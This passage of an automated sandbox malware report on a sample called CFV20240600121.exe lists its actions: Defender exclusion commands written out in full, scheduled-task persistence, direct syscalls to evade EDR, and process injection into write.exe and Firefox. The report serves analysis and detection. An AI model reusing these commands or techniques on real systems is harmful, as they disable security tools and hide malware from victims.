            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147EBD0 mov eax, dword ptr fs:[00000030h]12_2_0147EBD0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145CBF0 mov eax, dword ptr fs:[00000030h]12_2_0145CBF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FEBFC mov eax, dword ptr fs:[00000030h]12_2_013FEBFC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8BF0 mov eax, dword ptr fs:[00000030h]12_2_013D8BF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8BF0 mov eax, dword ptr fs:[00000030h]12_2_013D8BF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8BF0 mov eax, dword ptr fs:[00000030h]12_2_013D8BF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0BCD mov eax, dword ptr fs:[00000030h]12_2_013D0BCD
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0BCD mov eax, dword ptr fs:[00000030h]12_2_013D0BCD
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0BCD mov eax, dword ptr fs:[00000030h]12_2_013D0BCD
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F0BCB mov eax, dword ptr fs:[00000030h]12_2_013F0BCB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F0BCB mov eax, dword ptr fs:[00000030h]12_2_013F0BCB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F0BCB mov eax, dword ptr fs:[00000030h]12_2_013F0BCB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01484BB0 mov eax, dword ptr fs:[00000030h]12_2_01484BB0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01484BB0 mov eax, dword ptr fs:[00000030h]12_2_01484BB0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F4A35 mov eax, dword ptr fs:[00000030h]12_2_013F4A35
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F4A35 mov eax, dword ptr fs:[00000030h]12_2_013F4A35
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FEA2E mov eax, dword ptr fs:[00000030h]12_2_013FEA2E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147EA60 mov eax, dword ptr fs:[00000030h]12_2_0147EA60
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140CA6F mov eax, dword ptr fs:[00000030h]12_2_0140CA6F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140CA6F mov eax, dword ptr fs:[00000030h]12_2_0140CA6F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140CA6F mov eax, dword ptr fs:[00000030h]12_2_0140CA6F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144CA72 mov eax, dword ptr fs:[00000030h]12_2_0144CA72
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144CA72 mov eax, dword ptr fs:[00000030h]12_2_0144CA72
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145CA11 mov eax, dword ptr fs:[00000030h]12_2_0145CA11
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140CA24 mov eax, dword ptr fs:[00000030h]12_2_0140CA24
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0A5B mov eax, dword ptr fs:[00000030h]12_2_013E0A5B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0A5B mov eax, dword ptr fs:[00000030h]12_2_013E0A5B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6A50 mov eax, dword ptr fs:[00000030h]12_2_013D6A50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6A50 mov eax, dword ptr fs:[00000030h]12_2_013D6A50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6A50 mov eax, dword ptr fs:[00000030h]12_2_013D6A50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6A50 mov eax, dword ptr fs:[00000030h]12_2_013D6A50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6A50 mov eax, dword ptr fs:[00000030h]12_2_013D6A50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6A50 mov eax, dword ptr fs:[00000030h]12_2_013D6A50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D6A50 mov eax, dword ptr fs:[00000030h]12_2_013D6A50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140CA38 mov eax, dword ptr fs:[00000030h]12_2_0140CA38
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01426ACC mov eax, dword ptr fs:[00000030h]12_2_01426ACC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01426ACC mov eax, dword ptr fs:[00000030h]12_2_01426ACC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01426ACC mov eax, dword ptr fs:[00000030h]12_2_01426ACC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01404AD0 mov eax, dword ptr fs:[00000030h]12_2_01404AD0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01404AD0 mov eax, dword ptr fs:[00000030h]12_2_01404AD0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8AA0 mov eax, dword ptr fs:[00000030h]12_2_013D8AA0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8AA0 mov eax, dword ptr fs:[00000030h]12_2_013D8AA0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140AAEE mov eax, dword ptr fs:[00000030h]12_2_0140AAEE
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140AAEE mov eax, dword ptr fs:[00000030h]12_2_0140AAEE
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DEA80 mov eax, dword ptr fs:[00000030h]12_2_013DEA80
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DEA80 mov eax, dword ptr fs:[00000030h]12_2_013DEA80
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeNtCreateKey: Direct from: 0x76EF2C6C
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\CFV20240600121.exeMemory written: C:\Users\user\Desktop\CFV20240600121.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeMemory written: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: NULL target: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 7812
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread APC queued: target process: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeProcess created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"Jump to behavior
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308691425.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4524115081.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451899936.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308691425.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4524115081.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451899936.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308691425.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4524115081.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451899936.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308691425.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4524115081.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451899936.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\CFV20240600121.exeQueries volume information: C:\Users\user\Desktop\CFV20240600121.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
